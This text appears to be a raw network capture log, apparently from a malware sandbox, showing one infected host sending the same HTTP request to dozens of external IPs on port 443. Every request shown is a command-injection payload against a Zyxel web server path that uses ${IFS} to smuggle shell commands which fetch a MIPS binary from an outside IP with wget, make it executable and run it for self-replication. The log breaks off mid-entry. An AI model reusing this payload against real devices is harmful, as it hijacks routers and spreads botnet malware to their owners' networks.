                                                        Jan 28, 2024 10:12:44.244364977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2349192.168.2.1439934187.75.229.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244393110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2350192.168.2.144030654.129.215.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244427919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2351192.168.2.1443454163.0.51.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244487047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2352192.168.2.1449244134.70.158.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244529009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2353192.168.2.1451652150.55.54.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244551897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2354192.168.2.14544141.34.167.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244594097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2355192.168.2.144350052.145.171.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244637966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2356192.168.2.145755048.120.94.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244658947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2357192.168.2.1444368155.48.93.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244693041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2358192.168.2.1459204168.227.253.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244721889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2359192.168.2.1449420223.95.204.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244750977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2360192.168.2.1454662158.7.237.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244787931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2361192.168.2.1456980217.69.44.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244828939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2362192.168.2.14416508.64.126.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244885921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2363192.168.2.1456560179.129.229.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244932890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2364192.168.2.144471843.69.116.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244956017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2365192.168.2.1447520110.79.151.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244992971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2366192.168.2.145948892.136.39.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245049000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2367192.168.2.1460316130.7.229.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245075941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2368192.168.2.145767485.35.99.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245110035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2369192.168.2.1439356115.208.6.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245145082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2370192.168.2.1459982152.213.104.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245188951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2371192.168.2.1439612204.75.222.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245237112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2372192.168.2.1446786139.165.76.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245268106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2373192.168.2.1438550176.155.10.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245286942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2374192.168.2.1451586212.179.219.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245354891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2375192.168.2.1450974115.178.143.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245383978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2376192.168.2.1438832223.178.40.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245449066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2377192.168.2.1436866174.202.244.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245459080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2378192.168.2.145632034.31.107.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245485067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2379192.168.2.1440716213.19.95.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245531082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2380192.168.2.1442984141.89.110.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245590925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2381192.168.2.143834445.250.74.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245639086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2382192.168.2.1442244157.111.50.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245655060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2383192.168.2.14357781.63.77.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245687962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2384192.168.2.144831847.14.246.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245718956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2385192.168.2.14589721.107.60.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245774984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2386192.168.2.1451312209.231.179.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245807886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2387192.168.2.1432800164.235.184.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245836973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2388192.168.2.1453068102.137.126.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245883942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2389192.168.2.144816220.234.143.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245934010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2390192.168.2.1437132176.232.70.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245945930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2391192.168.2.1444464109.84.225.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.245980024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2392192.168.2.145235073.166.196.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246026993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2393192.168.2.1451476192.9.59.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246057034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2394192.168.2.1444748169.126.167.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246123075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2395192.168.2.1442770144.111.1.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246155024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2396192.168.2.1444510220.74.29.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246184111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2397192.168.2.143375484.159.241.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246220112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2398192.168.2.1440548113.232.57.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246268988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2399192.168.2.146077832.212.32.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246345997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2400192.168.2.1440556169.49.49.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246377945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2401192.168.2.1447196152.240.4.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246428967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2402192.168.2.1442798109.140.251.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246470928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2403192.168.2.1445100108.210.38.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246490002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2404192.168.2.144950039.151.97.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246524096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2405192.168.2.1451578175.168.245.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246558905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2406192.168.2.146054483.12.64.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246577024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2407192.168.2.1450616136.21.58.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246627092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2408192.168.2.143580467.166.94.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246654987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2409192.168.2.1450046132.63.83.117443
                                                        TimestampBytes transferredDirectionData
